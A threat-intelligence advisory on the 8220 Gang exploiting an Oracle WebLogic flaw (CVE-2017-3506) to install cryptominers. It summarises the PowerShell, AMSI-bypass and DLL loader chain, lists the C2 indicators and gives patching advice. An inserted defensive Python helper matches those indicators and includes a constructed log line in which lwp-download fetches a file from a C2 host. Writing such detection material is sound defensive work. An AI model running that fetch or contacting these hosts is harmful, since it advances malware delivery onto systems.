8220 Gang Exploiting Oracle WebLogic Flaw to Hijack Servers and Mine Cryptocurrency

Cyber Security Threat Summary:
“The notorious cryptojacking group tracked as 8220 Gang has been spotted weaponizing a six-year-old security flaw in Oracle WebLogic servers to ensnare vulnerable instances into a botnet and distribute cryptocurrency mining malware. The flaw in question is CVE-2017-3506 (CVSS score: 7.4), which, when successfully exploited, could allow an unauthenticated attacker to execute arbitrary commands remotely. ‘This allows attackers to gain unauthorized access to sensitive data or compromise the entire system,’ Trend Micro researcher Sunil Bharti said in a report published this week. 8220 Gang, first documented by Cisco Talos in late 2018, is so named for its original use of port 8220 for command-and-control (C2) network communications” (The Hacker News, 2023).

Security Officer Comments:
In the latest campaign, researchers noted that the Oracle WebLogic Server vulnerability was leveraged to deploy a PowerShell payload designed to create another obfuscated PowerShell script in memory. Once executed, the obfuscated script disables the Windows Anti-Malware Scan Interface (AMSI) and launches a Windows binary that is responsible for reaching out to a remote server and fetching an obfuscated payload.

“The intermediate DLL file, for its part, is configured to download a cryptocurrency miner from one of the three C2 servers – 179.43.155[.]202, work.letmaker[.]top, and su-94.letmaker[.]top – using TCP ports 9090, 9091, or 9092” (The Hacker News, 2023).

According to Trend Micro, the latest attacks also utilized a Linux tool named lwp-download to save arbitrary files on targeted systems.
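A defender-side triage helper, added here as an example and not part of the advisory or the cited reports: it refangs the C2 indicators quoted above, flags connection-log lines that reach those hosts (highest severity when the destination port is also one of 9090, 9091 or 9092), and surfaces lwp-download invocations in process logs. The log line formats and all sample lines are constructed for the example, not real captures.

```python
import re

# Indicators taken from the advisory text above, kept defanged as published.
C2_HOSTS_DEFANGED = {"179.43.155[.]202", "work.letmaker[.]top", "su-94.letmaker[.]top"}
C2_PORTS = {9090, 9091, 9092}


def refang(indicator: str) -> str:
    """Turn a defanged indicator ('a[.]b') back into a matchable hostname."""
    return indicator.replace("[.]", ".")


C2_HOSTS = {refang(h) for h in C2_HOSTS_DEFANGED}

# Constructed connection-log sample: "<ts> <src>:<sport> -> <dst>:<dport> <proto>"
CONN_LOG = """\
2023-05-20T10:00:01Z 10.0.0.5:51234 -> 93.184.216.34:443 tcp
2023-05-20T10:00:02Z 10.0.0.5:51235 -> 179.43.155.202:9090 tcp
2023-05-20T10:00:03Z 10.0.0.5:51236 -> work.letmaker.top:443 tcp
2023-05-20T10:00:04Z 10.0.0.5:51237 -> su-94.letmaker.top:9092 tcp
"""

# Constructed process-log sample: "<ts> <user> <command line>"
PROC_LOG = """\
2023-05-20T10:00:05Z oracle lwp-download http://work.letmaker.top:9091/file /tmp/file
2023-05-20T10:00:06Z oracle ls -la /tmp
"""

LINE_RE = re.compile(r"^(\S+) (\S+):(\d+) -> (\S+):(\d+) (\w+)$")


def classify(line: str):
    """Return a finding dict for a connection to a known C2 host, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, src, _sport, dst, dport, _proto = m.groups()
    if dst not in C2_HOSTS:
        return None
    # Host match alone is medium; host plus one of the reported ports is high.
    severity = "high" if int(dport) in C2_PORTS else "medium"
    return {"ts": ts, "src": src, "dst": dst, "dport": int(dport), "severity": severity}


def scan(log_text: str):
    """Scan a whole connection log and return the list of findings."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]


def lwp_download_events(log_text: str):
    """Return process-log lines that invoke the lwp-download utility."""
    return [l for l in log_text.splitlines() if re.search(r"\blwp-download\b", l)]
```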

“Considering the threat actor's tendency to reuse tools for different campaigns and abuse legitimate tools as part of the arsenal, organizations' security teams might be challenged to find other detection and blocking solutions to fend off attacks that abuse this utility,” stated researchers in a recent blog post.

Suggested Correction(s):
Organizations should ensure that their systems are up to date by applying fixes for vulnerabilities like CVE-2017-3506 as soon as they become available.

IOCs:
https://www.trendmicro.com/en_us/research/23/e/8220-gang-evolution-new-strategies-adapted.html

Link(s):
https://thehackernews.com/2023/05/8220-gang-exploiting-oracle-weblogic.html?m=1